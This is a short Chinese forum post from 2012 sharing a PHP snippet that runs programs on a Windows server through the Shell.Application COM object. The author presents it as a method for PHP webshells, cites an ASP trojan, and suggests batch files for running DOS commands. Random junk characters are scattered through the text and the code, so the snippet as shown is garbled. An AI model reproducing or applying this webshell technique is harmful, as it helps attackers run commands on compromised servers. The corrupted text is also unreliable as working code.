关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。+ J: C( Z7 v- {8 U V* j7 ~+ K
4 J8 }8 ?" f0 _" w2 V* X' Q" ~
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法+ }5 P) j$ F+ j( L+ l* A: L
7 k, l O; G3 Q* @+ q: z* f" I<?php6 s6 P4 c$ u r. |% N& `: u1 _
$wsh = new COM('Shell.Application') or die("Shell.Application");5 v- u1 k2 O4 S r+ L2 t1 ]
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
. U( e9 t1 s% d& ]# q% B //没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。
) ?( Z5 Y3 ?" P$ O& h$ r- m9 }?>
- N( R' q8 _* K3 Q$ j6 D
/ m0 J0 K1 r$ n5 sxp+APMServ5.2.0测试通过。
) F7 F' {# U l! J |
发表于 2012-9-15 14:29:01
收藏
支持
反对